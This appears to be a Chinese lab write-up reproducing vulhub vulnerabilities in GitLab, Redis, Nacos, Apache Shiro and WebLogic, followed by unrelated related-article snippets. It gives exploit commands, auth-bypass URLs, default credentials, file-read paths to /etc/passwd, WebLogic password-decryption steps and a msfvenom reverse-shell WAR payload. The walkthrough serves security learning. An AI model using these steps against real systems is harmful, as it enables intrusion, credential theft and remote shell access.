Gitlab、Redis、Nacos、Apache Shiro、Gitlab、weblogic相关漏洞

文章目录

  • 一、Gitlab远程代码执行(CVE-2021-22205)
  • 二、Redis主从复制远程命令执行
  • 三、Nacos认证绕过漏洞(CVE-2021-29441)
  • 四、Apache Shiro认证绕过漏洞(CVE-2020-1957)
  • 五、Gitlab任意文件读取漏洞(CVE-2016-9086)
  • 六、weblogic文件读取漏洞
    • 1、弱口令
    • 2、任意文件读取漏洞
    • 3、读取后台用户密文与密钥文件
    • 4、后台上传webshell

一、Gitlab远程代码执行(CVE-2021-22205)

docker-compose up -d # 开启容器

直接使用该脚本poc.py,命令如下:

python poc.py http://192.168.92.6:8080 "touch /tmp/success"

在这里插入图片描述

在这里插入图片描述

二、Redis主从复制远程命令执行

docker-compose up -d # 开启容器
redis-cli -h 127.0.0.1 # 连接redis数据库,会发现未授权

在这里插入图片描述
redis-rogue-getshel

python redis-master.py -r 192.168.92.6 -p 6379 -L 192.168.92.6 -P 8888 -f RedisModulesSDK/exp.so -c "id"

在这里插入图片描述

三、Nacos认证绕过漏洞(CVE-2021-29441)

如果nacos服务没有启动,可以使用docker-compose restart nacos

  1. 访问http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=10可以查看用户名和密码,注意:User-Agent: Nacos-Server
    在这里插入图片描述
  2. 添加新用户http://127.0.0.1:8848/nacos/v1/auth/users?username=vulhub&password=vulhub,注意:POST数据包。
    在这里插入图片描述
  3. 登录Nacoshttp://127.0.0.1:8848/nacos#login
    在这里插入图片描述
    在这里插入图片描述

四、Apache Shiro认证绕过漏洞(CVE-2020-1957)

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。
访问192.168.92.16:8080/admin/,显示302跳转
在这里插入图片描述
构造恶意路径,访问192.168.92.16:8080/xxx/..;/admin/,可绕过权限校验,访问到管理页面:
在这里插入图片描述

五、Gitlab任意文件读取漏洞(CVE-2016-9086)

访问192.168.92.16:8080,用户名为root,密码为vulhub123456。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在导入页面,将test.tar.gz上传,将会读取到/etc/passwd文件内容:
在这里插入图片描述

六、weblogic文件读取漏洞

1、弱口令

访问192.168.92.6:7001/console,用户名为weblogic,密码为Oracle@123。
在这里插入图片描述
常见弱口令

2、任意文件读取漏洞

访问192.168.92.6:7001/hello/file.jsp?path=/etc/passwd,实现任意文件下载。
在这里插入图片描述

3、读取后台用户密文与密钥文件

weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.datconfig.xml,在本环境中为./security/SerializedSystemIni.dat./config/config.xml

`SerializedSystemIni.dat`是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键`copy to file`就可以保存成一个文件:

在这里插入图片描述
config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的<node-manager-password-encrypted>的值,即为加密后的管理员密码:
在这里插入图片描述
在这里插入图片描述

注意:

  1. 在保存这个test.dat时,最好在HEX模式下进行复制。不然可能回报这个错:Null input buffer
    在这里插入图片描述
  2. 如果报错:PBEWITHSHAAND128BITRC2-CBC SecretKeyFactory not available,需要手动下载bcprov-jdk15on-1.56.jar,并放在<java目录>/jre/lib/ext/目录下。

4、后台上传webshell

在这里插入图片描述
在这里插入图片描述
使用msfvenom生成war包的反弹shell

msfvenom -p java/shell_reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f war -o shell.war

在这里插入图片描述

在这里插入图片描述
然后疯狂下一步,直到完成。点击我们刚刚部署的war包,然后启动即可获取反弹shell。
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/624501.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

北亚MF2200手机取证平台介绍

一、产品介绍。 北亚MF2200手机取证平台是由北亚企安科技&#xff08;北京&#xff09;有限公司&#xff08;Frombyte&#xff09;自主研发的一款针对智能手机&#xff08;iPhone、Android&#xff09;及 iPad 取证分析的法证平台。本平台采集速度快&#xff0c;可通过自动提取…

如何选择沙发3D模型下载?

在家具沙发定制过程中&#xff0c;选择合适的沙发3D模型可以方便地进行沟通&#xff0c;让双方能够更清晰地了解对方的设想。此外&#xff0c;通过3D模型&#xff0c;双方还可以更方便地对设计方案进行修改和完善。那么如何选择合适的沙发3D模型下载? 1.确定预算 在选择沙发3D…

一篇文章告诉你:通信网优比计算机岗位好在哪?

据优橙2023年就业人员专业分布统计&#xff0c;通信专业学员占比32.7%&#xff0c;非通信专业学员占比64.8%&#xff0c;其他占比2.5%。 可见从事网优的学员中大部分为非通信专业。而非通信专业中72%的学生在学习通信网优还是计算机专业中&#xff0c;选择了通信网优。 为什么越…

C# WinForm —— 14 CheckedListBox 复选列表框介绍

1. 简介 类似 ListBox&#xff0c;提供项的列表&#xff0c;区别就是 CheckedListBox 每一个项前面有个复选框 2. 常用属性 属性解释(Name)控件ID&#xff0c;在代码里引用的时候会用到,一般以 ckl 开头BackColor背景颜色BoderStyle边框样式&#xff1a;无、FixedSingle、F…

【错误的集合】力扣python

最初想法 def findErrorNums(nums):n len(nums)duplicate -1missing -1for num in nums:if nums[abs(num) - 1] < 0:duplicate abs(num)else:nums[abs(num) - 1] * -1for i in range(n):if nums[i] > 0:missing i 1breakreturn [duplicate, missing] 遇到力扣大佬…

[Go] 结构体不初始化仍然能够调用其方法

文章目录 背景复现原理验证验证2结论参考文档 背景 在写代码的时候&#xff0c;偶然没有将结构体初始化&#xff0c;又调用了该结构体的方法&#xff0c;编译器竟然没有报错&#xff0c;而且运行也是正常的。 复现 写了一个小 demo 用于复现&#xff0c;可以看到&#xff0c…

『 Linux 』重定向 Redirect(万字)

文章目录 &#x1f9f8; 什么是重定向&#x1f421; 文件描述符的分配规则&#x1f421; 重定向在日常使用中的简单示例 &#x1f9f8; 实现重定向的底层机制&#x1f421; dup2()&#x1f421; 利用dup2()实现重定向 &#x1f9f8; 在自定义Shell当中添加重定向功能&#x1f4…

Python tensor向量维度转换,不同维度的向量转化为相同的维度,经过全连接层MLP的维度转换,代码实战

问题&#xff1a;在机器学习特征工程中&#xff0c;假如每类特征需要转化为相同的维度进行拼接&#xff0c;那该怎么办呢&#xff1f;接一个全连接层MLP就可以了。 例子&#xff1a;将&#xff08;128,64&#xff09; 维度的向量转化为&#xff08;128,32&#xff09;维。 impo…

通过随机采样和数据增强来解决数据不平衡的问题

什么是类别不平衡 当每个类别的样本不平衡时&#xff0c;即在类别分布之间没有平衡比率时&#xff0c;会出现类别不平衡的问题。 这种失衡可能是轻微的&#xff0c;也可能是严重的。 取决于样本量&#xff0c;比率从1&#xff1a;2到1:10可以理解为轻微的不平衡&#xff0c;比…

基于UDP协议Python通信网络程序(服务器端+客户端)及通信协议在自动驾驶场景应用示例

一、UDP协议 UDP&#xff08;用户数据报协议&#xff09;是一种无连接的传输层协议&#xff0c;具有简单、高效的特点&#xff0c;适用于一些对数据可靠性要求不高的应用场景。UDP的主要特点包括无连接、不可靠和面向数据报。这意味着在发送数据之前不需要建立连接&#xff0c…

撤销 git add 操作(忽略被追踪的文件)

文章目录 引言I git rm命令来取消暂存【推荐】II 撤销特定文件的暂存状态2.1 git rese2.2 git restoresee also引言 应用场景: 修改.gitignoregitignore只能忽略那些原来没有被追踪的文件,如果某些文件已经被纳入了版本管理中,则修改.gitignore是无效的。那么解决方法就是先…

国产化开源鸿蒙系统智能终端RK3568主板在电子班牌项目的应用

国产化开源鸿蒙系统智能终端主板AIoT-3568A、人脸识别算法的的电子班牌方案可支持校园信息发布、人脸识别考勤、考场管理、查询互动等多项功能&#xff0c;助力学校在硬件上实现信息化、网络化、数字化&#xff0c;构建“学校、教师、学生”三个维度的智慧教育空间。 方案优势 …

微软推出的Microsoft Fabric 到底是什么?

近期&#xff0c;总有客户问小编&#xff0c;微软推出的 Microsoft Fabric 是什么&#xff1f;这个产品有什么特别之处呢&#xff1f;希望下面这篇文章能为大家解开一些疑惑。 微软Fabric是2023年5月推出的一个数据分析平台&#xff0c;它将关键数据管理和分析工作负载整合到一…

618值得入手的数码产品怎么选?2024 买过不后悔的数码好物分享

在数字时代的浪潮中&#xff0c;每一次的购物狂欢节都如同一场科技盛宴&#xff0c;让我们有机会接触到最前沿、最实用的数码产品&#xff0c;而“618”无疑是这场盛宴中最为引人瞩目的日子之一。面对琳琅满目的商品&#xff0c;如何选择那些真正值得入手的数码好物&#xff0c…

Java全局异常处理,@ControllerAdvice异常拦截原理解析【简单易懂】

https://www.bilibili.com/video/BV1sS411c7Mo 文章目录 一、全局异常处理器的类型1-1、实现方式一1-2、实现方式二 二、全局异常拦截点2-1、入口2-2、全局异常拦截器是如何注入到 DispatcherServlet 的 三、ControllerAdvice 如何解析、执行3-1、解析3-2、执行 四、其它4-1、设…

pdf怎么标注红色方框?五种PDF标注红色方框方法

pdf怎么标注红色方框&#xff1f;在当今数字化时代&#xff0c;PDF文档已成为我们日常工作和学习中不可或缺的一部分。然而&#xff0c;如何在海量的PDF文件中快速、准确地标注出重要信息&#xff0c;让内容更加醒目呢&#xff1f;今天&#xff0c;我将向大家介绍五种PDF标注红…

AI 图像生成-环境配置

一、python环境安装 Windows安装Python&#xff08;图解&#xff09; 二、CUDA安装 CUDA安装教程&#xff08;超详细&#xff09;-CSDN博客 三、Git安装 git安装教程&#xff08;详细版本&#xff09;-CSDN博客 四、启动器安装 这里安装的是秋叶aaaki的安装包 【AI绘画…

苹果cms:搜索功能的开关与设置

今天有个小伙伴问了个关于苹果cms搜索的问题&#xff1a;直接搜演员搜索不到影片信息&#xff08;如下图&#xff09; 1、我们拿演员王宝强为例&#xff1a;搜索王宝强后结果显示无相关视频 2、但是我们搜索王宝强主演的“大闹天竺”后却能得到关于王宝强的影片信息。这是为什…

【无重复字符的最长字串】

P. S.&#xff1a;以下代码均在VS2019环境下测试&#xff0c;不代表所有编译器均可通过。 P. S.&#xff1a;测试代码均未展示头文件stdio.h的声明&#xff0c;使用时请自行添加。 Problem: 3. 无重复字符的最长子串 文章目录 1、思路2、解题方法3、复杂度4、Code5、结语 1、思…

string容器-构造函数

基本概念 string本质上是一个类string类内部封装了很多成员方法&#xff0c;例如&#xff1a;查找find、拷贝copy&#xff0c;删除delete&#xff0c;替换replace&#xff0c;插入insertstring管理char*所分配的内存&#xff0c;不用担心复制越界和取值越界等&#xff0c;由类…